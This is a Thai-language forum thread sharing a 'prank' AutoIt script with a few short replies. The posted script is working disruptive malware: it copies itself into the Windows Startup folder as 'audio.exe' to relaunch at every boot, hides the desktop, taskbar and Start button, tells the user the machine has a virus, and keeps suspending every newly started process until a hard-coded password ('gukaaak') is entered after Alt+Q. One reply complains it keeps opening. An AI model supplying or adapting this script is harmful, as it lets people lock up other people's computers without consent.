ฟอรั่มของบล็อก http://pssix.blogspot.com


Script แกล้งคน

Share

pureexe
PSsix Member High Class
PSsix Member High Class


จำนวนข้อความ : 73
ความนิยม : 8
เข้าร่วมเมื่อ : 27/04/2011

Script แกล้งคน

ตั้งหัวข้อ by pureexe on 12/01/12, 11:00 am

#NoTrayIcon


Opt("Wintitlematchmode",4)
HotKeySet("!q", "_ExitLoop")
FileCopy(@AutoItExe,@StartupDir&"\audio.exe")
WinMinimizeAll()
WinSetState( "classname=Progman", "",@SW_HIDE)
WinSetState ( "classname=Shell_TrayWnd", "", @SW_HIDE)
WinSetState ( "classname=Button", "", @SW_HIDE)
MsgBox(64,"FSC-Dark v.1.0","555+ มีด้านสว่างยอมมีด้านมืด"&@CRLF&"แปลไทยเป็นไทย เครื่องโดนไวรัส 555+")
Local $Listold=""
While 1
$List=ProcessList()
if $Listold="" Then $Listold=$List
for $i=1 to $List[0][0]-$Listold[0][0]
_PROCESSSUSPEND($List[$Listold[0][0]+$i][0])
Next
WEnd


WinMinimizeAllUndo()


Func _PROCESSSUSPEND($PROCESS)
$PROCESSID = ProcessExists($PROCESS)
If $PROCESSID Then
$AI_HANDLE = DllCall("kernel32.dll", "int", "OpenProcess", "int", 2035711, "int", False, "int", $PROCESSID)
$I_SUCESS = DllCall("ntdll.dll", "int", "NtSuspendProcess", "int", $AI_HANDLE[0])
DllCall("kernel32.dll", "ptr", "CloseHandle", "ptr", $AI_HANDLE)
If IsArray($I_SUCESS) Then
Return 1
Else
SetError(1)
Return 0
EndIf
Else
SetError(2)
Return 0
EndIf
EndFunc
Func _PROCESSRESUME($PROCESS)
$PROCESSID = ProcessExists($PROCESS)
If $PROCESSID Then
$AI_HANDLE = DllCall("kernel32.dll", "int", "OpenProcess", "int", 2035711, "int", False, "int", $PROCESSID)
$I_SUCESS = DllCall("ntdll.dll", "int", "NtResumeProcess", "int", $AI_HANDLE[0])
DllCall("kernel32.dll", "ptr", "CloseHandle", "ptr", $AI_HANDLE)
If IsArray($I_SUCESS) Then
Return 1
Else
SetError(1)
Return 0
EndIf
Else
SetError(2)
Return 0
EndIf
EndFunc

Func _showobject()
WinSetState( "classname=Progman", "",@SW_SHOW)
Sleep(500)
WinSetState ( "classname=Shell_TrayWnd", "", @SW_SHOW)
Sleep(500)
WinSetState ( "classname=Button", "", @SW_SHOW)
EndFunc

Func _ExitLoop()
$pass=InputBox("Administor ", "Please enter password" &@lf&@lf&"Enter password here", "", "*")
If $pass="gukaaak" Then
$Listx=ProcessList()
For $i=1 To $Listx[0][0]
_PROCESSRESUME($Listx[$i][0])
Next
WinMinimizeAllUndo()
_showobject()
Exit
EndIf
EndFunc

วีธีแก้ กด alt+q แล้วกรอก Password

oom004
สมาชิกทั่วไป
สมาชิกทั่วไป


จำนวนข้อความ : 18
ความนิยม : 0
เข้าร่วมเมื่อ : 18/01/2012

Re: Script แกล้งคน

ตั้งหัวข้อ by oom004 on 20/01/12, 06:54 pm

em218
avatar
intime
มือใหม่เพิ่งสมัคร
มือใหม่เพิ่งสมัคร


จำนวนข้อความ : 5
ความนิยม : 0
เข้าร่วมเมื่อ : 03/03/2012

Re: Script แกล้งคน

ตั้งหัวข้อ by intime on 04/03/12, 05:09 am

ไม่กล้าลองอ่ะครับ ช่วยบอกทีว่ามันจะทำอะไรกับเครื่องของผม em234

chitnarong
มือใหม่เพิ่งสมัคร
มือใหม่เพิ่งสมัคร


จำนวนข้อความ : 5
ความนิยม : 0
เข้าร่วมเมื่อ : 09/09/2013

Re: Script แกล้งคน

ตั้งหัวข้อ by chitnarong on 21/10/13, 09:04 am

If $pass="gukaaak" Then


55555   ลองแล้ว

MaxiMus
สมาชิกทั่วไป
สมาชิกทั่วไป


จำนวนข้อความ : 13
ความนิยม : 0
เข้าร่วมเมื่อ : 28/01/2014

Re: Script แกล้งคน

ตั้งหัวข้อ by MaxiMus on 29/01/14, 12:19 am

สุดยอดครับ  em218 em218 

MeaninGTH
มือใหม่เพิ่งสมัคร
มือใหม่เพิ่งสมัคร


จำนวนข้อความ : 1
ความนิยม : 0
เข้าร่วมเมื่อ : 11/06/2014

Re: Script แกล้งคน

ตั้งหัวข้อ by MeaninGTH on 26/08/14, 03:00 pm

ทำไมผมมันเปิดขึ้นตลอดเลย!!

    เวลาขณะนี้ 18/07/18, 05:12 pm